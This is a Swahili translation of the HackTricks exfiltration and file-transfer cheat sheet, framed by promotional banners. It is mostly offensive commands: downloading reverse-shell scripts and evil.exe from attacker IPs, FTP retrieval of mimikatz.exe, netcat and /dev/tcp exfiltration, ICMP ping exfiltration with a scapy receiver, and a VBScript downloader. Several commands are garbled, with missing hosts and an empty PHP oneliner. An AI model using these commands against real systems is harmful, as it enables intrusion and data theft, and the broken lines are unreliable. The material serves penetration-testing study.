# Kufyonza
Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! Njia nyingine za kusaidia HackTricks: * Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)! * Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) * Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee * **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
**Kikundi cha Usalama cha Kujitahidi Kwa Bidii**
{% embed url="https://discord.gg/tryhardsecurity" %} *** ## Vyanzo vya kawaida vilivyoorodheshwa kwa ajili ya kufyonza taarifa Angalia [https://lots-project.com/](https://lots-project.com/) kupata vyanzo vya kawaida vilivyoorodheshwa ambavyo vinaweza kutumiwa vibaya ## Nakili\&Banda la Msingi wa 64 **Linux** ```bash base64 -w0 #Encode file base64 -d file #Decode file ``` **Windows** ``` certutil -encode payload.dll payload.b64 certutil -decode payload.b64 payload.dll ``` ## HTTP **Linux** ```bash wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py fetch 10.10.14.14:8000/shell.py #FreeBSD ``` **Windows** ```bash certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf #PS (New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe") Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe" wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe" Import-Module BitsTransfer Start-BitsTransfer -Source $url -Destination $output #OR Start-BitsTransfer -Source $url -Destination $output -Asynchronous ``` ### Pakia faili * [**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170) * [**SimpleHttpServer printing GET and POSTs (also headers)**](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149) * Moduli wa Python [uploadserver](https://pypi.org/project/uploadserver/): ```bash # Listen to files python3 -m pip install --user uploadserver python3 -m uploadserver # With basic auth: # python3 -m uploadserver --basic-auth hello:world # Send a file curl -X POST http://HOST/upload -H -F 'files=@file.txt' # With basic auth: # curl -X POST http://HOST/upload -H -F 'files=@file.txt' -u hello:world ``` ### **Seva ya HTTPS** ```python # from https://gist.github.com/dergachev/7028596 # taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/ # generate server.xml with the following command: # openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes # run as follows: # python simple-https-server.py # then in your browser, visit: # https://localhost:443 ### PYTHON 2 import BaseHTTPServer, SimpleHTTPServer import ssl httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler) httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True) httpd.serve_forever() ### ### PYTHON3 from http.server import HTTPServer, BaseHTTPRequestHandler import ssl httpd = HTTPServer(('0.0.0.0', 443), BaseHTTPRequestHandler) httpd.socket = ssl.wrap_socket(httpd.socket, certfile="./server.pem", server_side=True) httpd.serve_forever() ### ### USING FLASK from flask import Flask, redirect, request from urllib.parse import quote app = Flask(__name__) @app.route('/') def root(): print(request.get_json()) return "OK" if __name__ == "__main__": app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443) ### ``` ## FTP ### Seva ya FTP (python) ```bash pip3 install pyftpdlib python3 -m pyftpdlib -p 21 ``` ### Seva ya FTP (NodeJS) ``` sudo npm install -g ftp-srv --save ftp-srv ftp://0.0.0.0:9876 --root /tmp ``` ### Seva ya FTP (pure-ftp) ```bash apt-get update && apt-get install pure-ftp ``` ```bash #Run the following script to configure the FTP server #!/bin/bash groupadd ftpgroup useradd -g ftpgroup -d /dev/null -s /etc ftpuser pure-pwd useradd fusr -u ftpuser -d /ftphome pure-pw mkdb cd /etc/pure-ftpd/auth/ ln -s ../conf/PureDB 60pdb mkdir -p /ftphome chown -R ftpuser:ftpgroup /ftphome/ /etc/init.d/pure-ftpd restart ``` ### **Mteja wa Windows** ```bash #Work well with python. With pure-ftp use fusr:ftp echo open 10.11.0.41 21 > ftp.txt echo USER anonymous >> ftp.txt echo anonymous >> ftp.txt echo bin >> ftp.txt echo GET mimikatz.exe >> ftp.txt echo bye >> ftp.txt ftp -n -v -s:ftp.txt ``` ## SMB Kali kama server ```bash kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory kali_op2> smbserver.py -smb2support name /path/folder # Share a folder #For new Win10 versions impacket-smbserver -smb2support -user test -password test test `pwd` ``` Au tengeneza sehemu ya smb **kwa kutumia samba**: ```bash apt-get install samba mkdir /tmp/smb chmod 777 /tmp/smb #Add to the end of /etc/samba/smb.conf this: [public] comment = Samba on Ubuntu path = /tmp/smb read only = no browsable = yes guest ok = Yes #Start samba service smbd restart ``` ### Exfiltration Techniques on Windows #### Clipboard The clipboard can be used to exfiltrate data by copying sensitive information and pasting it into a file or application on the attacker's system. #### File Transfer Protocols File transfer protocols such as FTP, SFTP, and SMB can be used to transfer files containing sensitive data from the compromised system to the attacker's system. #### Email Email can be used to exfiltrate data by sending emails with attachments containing sensitive information to an email account controlled by the attacker. #### DNS Tunneling DNS tunneling can be used to exfiltrate data by encoding sensitive information in DNS queries and responses. #### Web Protocols Web protocols such as HTTP and HTTPS can be used to exfiltrate data by sending HTTP requests containing sensitive information to a web server controlled by the attacker. ```bash CMD-Wind> \\10.10.14.14\path\to\exe CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali" WindPS-2> cd new_disk: ``` ## SCP Mshambuliaji lazima awe na SSHd inayofanya kazi. ```bash scp @:/ ``` ## SSHFS Ikiwa muathiriwa ana SSH, mkaidi anaweza kufunga saraka kutoka kwa muathiriwa kwenda kwa mkaidi. ```bash sudo apt-get install sshfs sudo mkdir /mnt/sshfs sudo sshfs -o allow_other,default_permissions @:/ /mnt/sshfs/ ``` ## NC ### Data Exfiltration Data exfiltration is the unauthorized transfer of data from a computer or server. Attackers use various techniques to exfiltrate data, such as: - **Email**: Sending sensitive data as email attachments. - **FTP**: Transferring data using File Transfer Protocol (FTP). - **DNS**: Sending data through DNS requests. - **HTTP/HTTPS**: Using HTTP or HTTPS protocols to send data. - **Steganography**: Hiding data within other files to avoid detection. - **Encryption**: Encrypting data before exfiltration to avoid detection. To prevent data exfiltration, organizations can implement measures such as: - **Network Segmentation**: Dividing the network into segments to limit unauthorized access. - **Data Loss Prevention (DLP)**: Implementing DLP solutions to monitor and control data transfers. - **Access Controls**: Restricting access to sensitive data based on user roles. - **Monitoring and Logging**: Monitoring network traffic and logging events for analysis. - **Encryption**: Encrypting data at rest and in transit to protect it from unauthorized access. By understanding common exfiltration techniques and implementing appropriate security measures, organizations can better protect their data from unauthorized access and leakage. ```bash nc -lvnp 4444 > new_file nc -vn 4444 < exfil_file ``` ## /dev/tcp ### Pakua faili kutoka kwa muathiriwa ```bash nc -lvnp 80 > file #Inside attacker cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim ``` ### Pakia faili kwa muathiriwa ```bash nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker # Inside victim exec 6< /dev/tcp/10.10.10.10/4444 cat <&6 > file.txt ``` Asante kwa **@BinaryShadow\_** ## **ICMP** ```bash # To exfiltrate the content of a file via pings you can do: xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line ; done #This will 4bytes per ping packet (you could probably increase this until 16) ``` ```python from scapy.all import * #This is ippsec receiver created in the HTB machine Mischief def process_packet(pkt): if pkt.haslayer(ICMP): if pkt[ICMP].type == 0: data = pkt[ICMP].load[-4:] #Read the 4bytes interesting print(f"{data.decode('utf-8')}", flush=True, end="") sniff(iface="tun0", prn=process_packet) ``` ## **SMTP** Ikiwa unaweza kutuma data kwa seva ya SMTP, unaweza kuunda SMTP ya kupokea data kwa kutumia python: ```bash sudo python -m smtpd -n -c DebuggingServer :25 ``` ## TFTP Kwa chaguo-msingi katika XP na 2003 (katika nyingine inahitaji kuongezwa wazi wakati wa usakinishaji) Katika Kali, **anzisha seva ya TFTP**: ```bash #I didn't get this options working and I prefer the python option mkdir /tftp atftpd --daemon --port 69 /tftp cp /path/tp/nc.exe /tftp ``` **Server ya TFTP kwa python:** ```bash pip install ptftpd ptftpd -p 69 tap0 . # ptftp -p ``` Katika **mwendazake**, unganisha kwenye seva ya Kali: ```bash tftp -i get nc.exe ``` ## PHP Pakua faili kwa PHP oneliner: ```bash echo "" > down2.php ``` ## VBScript VBScript ni lugha ya programu inayotumika sana kwa maendeleo ya skripti za Windows. Inaweza kutumika kwa ufanisi kwa madhumuni ya uhamishaji wa data kwa sababu ya uwezo wake wa kufanya kazi na faili za nje na mitandao. ```bash Attacker> python -m SimpleHTTPServer 80 ``` **Mnajisi** ```bash echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs echo Err.Clear >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs echo If http Is Nothing Then Set http =CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs echo http.Open "GET", strURL, False >> wget.vbs echo http.Send >> wget.vbs echo varByteArray = http.ResponseBody >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs echo strData = "" >> wget.vbs echo strBuffer = "" >> wget.vbs echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs echo Next >> wget.vbs echo ts.Close >> wget.vbs ``` ```bash cscript wget.vbs http://10.11.0.5/evil.exe evil.exe ``` ## Debug.exe Programu ya `debug.exe` sio tu inaruhusu ukaguzi wa binaries lakini pia ina **uwezo wa kujenga upya kutoka hex**. Hii inamaanisha kwamba kwa kutoa hex ya binary, `debug.exe` inaweza kuzalisha faili ya binary. Hata hivyo, ni muhimu kutambua kwamba debug.exe ina **kizuizi cha kuunda faili hadi 64 kb in size**. ```bash # Reduce the size upx -9 nc.exe wine exe2bat.exe nc.exe nc.txt ``` Kisha nakili na ushirikishe maudhui kwenye windows-shell na faili inayoitwa nc.exe itaundwa. * [https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html](https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html) ## DNS * [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil) **Kikundi cha Usalama cha Kujaribu Kwa Bidii**
{% embed url="https://discord.gg/tryhardsecurity" %}
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! Njia nyingine za kusaidia HackTricks: * Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)! * Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) * Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee * **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.